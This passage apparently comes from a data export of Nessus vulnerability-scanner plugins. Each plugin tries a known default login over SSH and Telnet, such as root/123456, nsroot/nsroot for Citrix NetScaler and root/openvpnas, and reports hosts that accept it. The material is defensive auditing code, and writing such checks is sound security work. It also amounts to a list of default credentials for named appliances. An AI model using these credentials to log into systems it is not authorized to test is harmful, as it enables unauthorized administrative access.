script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'tech' on the remote host has the default password 'tech'.\nA remote attacker can exploit this issue to gain administrative access\nto the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:27", "description": "The account 'root' on the remote host has the default password 'pass'.\nA remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'pass' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_PASS.NASL", "href": "https://www.tenable.com/plugins/nessus/94395", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"pass\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94395);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'pass' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password 'pass'.\nA remote attacker can exploit this issue to gain administrative access\nto the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:29", "description": "The account 'admin' on the remote host has the default password '1111111'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '1111111' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_1111111.NASL", "href": "https://www.tenable.com/plugins/nessus/94361", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"1111111\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94361);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '1111111' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'1111111'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:29", "description": "The account 'root' on the remote host has the default password '123456'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '123456' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_123456.NASL", "href": "https://www.tenable.com/plugins/nessus/94380", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"123456\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94380);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '123456' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'123456'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:36:04", "description": "The account 'nsroot' on the remote host has the password 'nsroot'.\n\nAn attacker may leverage this issue to gain administrative access to the affected system. \n\nNote that Citrix NetScaler appliances are known to use these credentials to provide complete, administrative access to the Citrix NetScaler appliance.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-05-13T00:00:00", "type": "nessus", "title": "Default Password (nsroot) for 'nsroot' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_NSROOT_NSROOT.NASL", "href": "https://www.tenable.com/plugins/nessus/66393", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"nsroot\";\npassword = \"nsroot\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66393);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (nsroot) for 'nsroot' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'nsroot' on the remote host has the password 'nsroot'.\n\nAn attacker may leverage this issue to gain administrative access to \nthe affected system. \n\nNote that Citrix NetScaler appliances are known to use these \ncredentials to provide complete, administrative access to the Citrix \nNetScaler appliance.\");\n # http://support.citrix.com/proddocs/topic/netscaler-admin-guide-93/ns-ag-aa-reset-default-amin-pass-tsk.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74336bf9\");\n script_set_attribute(attribute:\"solution\", value:\n\"If the host is a Citrix NetScaler, reset the nsroot password. \n\nOtherwise, set a strong password for this account or use ACLs to\nrestrict access to the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (!thorough_tests && !get_kb_item(\"Settings/test_all_accounts\")) exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:36:47", "description": "The account 'root' on the remote host has the password 'openvpnas'.\n\nAn attacker may leverage this issue to gain administrative access to the affected system.\n\nNote that OpenVPN Access Server virtual appliances are known to use these credentials to provide complete, administrative access to the appliance.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-05-30T00:00:00", "type": "nessus", "title": "Default Password (openvpnas) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_OPENVPNAS.NASL", "href": "https://www.tenable.com/plugins/nessus/66693", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"root\";\npassword = \"openvpnas\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66693);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (openvpnas) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'openvpnas'.\n\nAn attacker may leverage this issue to gain administrative access to\nthe affected system.\n\nNote that OpenVPN Access Server virtual appliances are known to use\nthese credentials to provide complete, administrative access to the\nappliance.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:32:20", "description": "The account 'debug' on the remote host uses the password 'synnet'. An attacker may use it to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2005-03-08T00:00:00", "type": "nessus", "title": "Default Password (synnet) for 'debug' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_DEBUG_SYNNET.NASL", "href": "https://www.tenable.com/plugins/nessus/17289", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"debug\";\npassword = \"synnet\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17289);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n script_bugtraq_id(88);\n\n script_name(english:\"Default Password (synnet) for 'debug' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with default admin credentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'debug' on the remote host uses the password 'synnet'. \nAn attacker may use it to gain further privileges on this system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/1998/May/40\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it if possible.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:W/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:31:14", "description": "The account 'help' on the remote host does not have a password set. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2005-03-19T00:00:00", "type": "nessus", "title": "Unpassworded 'help' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_HELP.NASL", "href": "https://www.tenable.com/plugins/nessus/17575", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"help\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17575);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n script_bugtraq_id(247);\n\n script_name(english:\"Unpassworded 'help' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'help' on the remote host does not have a password set. \nAn attacker may use this to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 